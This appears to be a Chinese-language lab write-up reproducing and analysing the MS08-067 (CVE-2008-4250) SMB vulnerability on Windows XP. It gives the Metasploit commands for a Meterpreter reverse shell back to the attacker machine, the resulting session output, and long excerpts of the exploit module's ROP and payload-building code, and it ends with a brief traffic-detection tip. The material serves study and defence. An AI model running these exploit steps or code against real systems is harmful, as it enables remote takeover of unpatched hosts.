测试环境信息
| 机器名 | 机器版本 | 机器IP | 说明 |
|---|---|---|---|
| kali | kali | 192.168.126.128 | 攻击机器 |
| Win_XP | Win_XP_SP3_x86 | 192.168.126.141 | 受攻击的客户端 |
环境准备
kali 无需准备,直接可使用
漏洞复现
-
运行metasploit
root@kali:~/pocs/cve-2008-4250# msfconsole -
设置exp
msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.126.136 rhost => 192.168.126.136 -
设置利用方式
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.126.128 lhost => 192.168.126.128 msf5 exploit(windows/smb/ms08_067_netapi) > set target 34 target => 34最终设置结果如图:
options.png
- 执行,观察返回结果,成功返回shell
shell:msf5 exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.126.128:4444 [*] 192.168.126.136:445 - Attempting to trigger the vulnerability... [*] Sending stage (179779 bytes) to 192.168.126.136 [*] Meterpreter session 1 opened (192.168.126.128:4444 -> 192.168.126.136:1037) at 2019-05-06 07:16:53 -0400
shell.png
工具链接
metasploit
参考链接
漏洞分析
CVE-2008-4250原理简介
CVE-2008-4250微软编号为MS08-067,根据微软安全漏洞公告,基本可以了解其原理:
MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化(将路径字符串中的'/'转换为'\',同时去除相对路径"\."和"\.."),而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。
poc代码分析:
def initialize(info = {})
super(update_info(info,
'Name' => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
'Description' => %q{
This module exploits a parsing flaw in the path canonicalization code of
NetAPI32.dll through the Server Service. This module is capable of bypassing
NX on some operating systems and service packs. The correct target must be
used to prevent the Server Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to handle multiple successful
exploitation events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full support for
NX bypass on 2003, along with other platforms, is still in development.
},
'Author' =>
[
'hdm', # with tons of input/help/testing from the community
'Brett Moore <brett.moore[at]insomniasec.com>',
'frank2 <frank2[at]dc949.org>', # check() detection
'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
],
'License' => MSF_LICENSE,
'References' =>
[
%w(CVE 2008-4250),
%w(OSVDB 49243),
%w(MSB MS08-067),
# If this vulnerability is found, ms08-67 is exposed as well
['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 408,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
'Prepend' => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
...
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf807,
'DisableNX' => 0x58fc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
register_options(
[
OptString.new('SMBPIPE', [true, 'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),
])
end
从该部分poc代码可以明显看出,漏洞发生的位置位于Server服务调用的NetAPI32.dll动态链接库中,进行path canonicalization的代码,此模块甚至可以绕过一些版本系统的DEP数据执行保护。
def exploit
begin
connect
smb_login
rescue Rex::Proto::SMB::Exceptions::LoginError => e
if e.message =~ /Connection reset/
print_error('Connection reset during login')
print_error('This most likely means a previous exploit attempt caused the service to crash')
return
else
raise e
end
end
# Use a copy of the target
mytarget = target
if target['auto']
mytarget = nil
print_status('Automatically detecting the target...')
fprint = smb_fingerprint
-------------------snip-----------------------------------------------
#
# 构建恶意路径名
#
padder = [*('A'..'Z')]
pad = 'A'
while pad.length < 7
c = padder[rand(padder.length)]
next if pad.index(c)
pad += c
end
#漏洞触发条件
prefix = '\\'
path = ''
server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
------------------------------snip--------------------------------------
#
# Windows XP SP2/SP3 ROP Stager targets
#
elsif mytarget['UseROP']
rop = generate_rop(mytarget['UseROP'])
path =
Rex::Text.to_unicode('\\') +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# 此处就可以触发漏洞
Rex::Text.to_unicode('\\..\\..\\') +
# Extra padding
Rex::Text.to_unicode(pad) +
# ROP Stager
rop +
# Padding (skipped)
Rex::Text.rand_text_alpha(2) +
# NULL termination
"\x00" * 2
--------------------------------snip-------------------------------------
end
--------------------------------snip-------------------------------------
def generate_rop(version)
free_byte = "\x90"
# free_byte = "\xcc"
# create a few small gadgets
# <free byte>; pop edx; pop ecx; ret
gadget1 = free_byte + "\x5a\x59\xc3"
# mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
# <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
gadget3 = "\xcc" + free_byte + "\xeb\x5a"
# gadget2:
# get eax into edi
# adjust edi
# get 0x7f in ecx
# copy the data
# jmp to it
#
dws = gadget2.unpack('V*')
##
# Create the ROP stager, pfew.. Props to corelanc0d3r!
# This was no easy task due to space limitations :-/
# -jduck
##
module_name = 'ACGENRAL.DLL'
module_base = 0x6f880000
rvasets = {}
-----------------------------snip----------------------------------------
# XP SP3
rvasets['5.1.2600.5512'] = {
# call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
'call_HeapCreate' => 0x21286,
'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
'pop ecx / ret' => 0x2e796 + 6,
'mov [eax], ecx / ret' => 0xd296,
'jmp eax' => 0x19c6f,
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
'mov [eax+0x10], ecx / ret' => 0x10a56 + 6,
'add eax, 8 / ret' => 0x29c64
}
# HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
rop = [
# prime ebp (adjustment distance)
0x00018000,
# get some RWX memory via HeapCreate
'call_HeapCreate',
0x01040110, # flOptions (gets & with 0x40005)
0x01010101,
0x01010101,
# adjust the returned pointer
'add eax, ebp / mov ecx, 0x59ffffa8 / ret',
# setup gadget1
'pop ecx / ret',
gadget1.unpack('V').first,
'mov [eax], ecx / ret',
# execute gadget1
'jmp eax',
# setup gadget2 (via gadget1)
dws[0],
dws[1],
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',
# setup part3 of gadget2
'pop ecx / ret',
dws[2],
'mov [eax+0x10], ecx / ret',
# execute gadget2
'add eax, 8 / ret',
'jmp eax',
# gadget3 gets executed after gadget2 (luckily)
gadget3.unpack('V').first
]
# convert the meta rop into concrete bytes
rvas = rvasets[version]
rop.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
module_base + rvas[e]
elsif e == :unused
# Randomize
rand_text(4).unpack('V').first
else
# Literal
e
end
}
ret = rop.pack('V*')
# check badchars?
# idx = Rex::Text.badchar_index(ret, payload_badchars)
ret
end
exploit建立了TCP连接,然后进行SMB空会话连接。构建恶意路径,先初始化一些变量,填补字符串pad、服务器名称server以及前缀prefix、路径path。函数使用rop技术构建shellcode,将payload进行编码之后,构造触发漏洞的unicode相对路径"\..\..\",然后填充字符串,添加字符串结尾'\0'。
而在前面提到的target初始化部分:
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf807,
'DisableNX' => 0x58fc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
定义且赋值了变量Ret、Scratch,且Ret对应的是ACGENRAL.DLL中的JMP ESI指令地址,可知该模块利用ESI寄存器中指向栈空间的地址,覆盖返回地址,并通过ACGENRAL.DLL中的JMP ESI指令进行中专跳转,最终执行栈中的Shelllcode。
然后和远程服务器进行交互,发送构造的数据:
#向远程主机发起RPC请求
handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
begin
# Samba doesn't have this handle and returns an ErrorCode
dcerpc_bind(handle)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("SMB error: #{e.message}")
return Msf::Exploit::CheckCode::Safe
end
vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)
#将前面构造的数据整合成数据包Stub
stub =
NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(8) +
NDR.wstring(prefix) +
NDR.long(4097) +
NDR.long(0)
#将stub最为内容调用远程主机的RPC端口
resp = dcerpc.call(0x1f, stub)
error = resp[4, 4].unpack('V')[0]
# Cleanup
simple.client.close
simple.client.tree_disconnect
disconnect
if (error == 0x0052005c) # \R :)
return Msf::Exploit::CheckCode::Vulnerable
else
vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
return Msf::Exploit::CheckCode::Safe
end
end
Stub是符合NetPathCanonicalize结构的标准调用包头,将触发远程主机上的Server服务去调用规范化路径处理函数NetpwPathCanoncalize,从而触发漏洞。
漏洞检测
在防火墙中进行流量监测,主要是针对数据包中存在的形如"\********\..\..\*****"这样的恶意路径名进行检测。
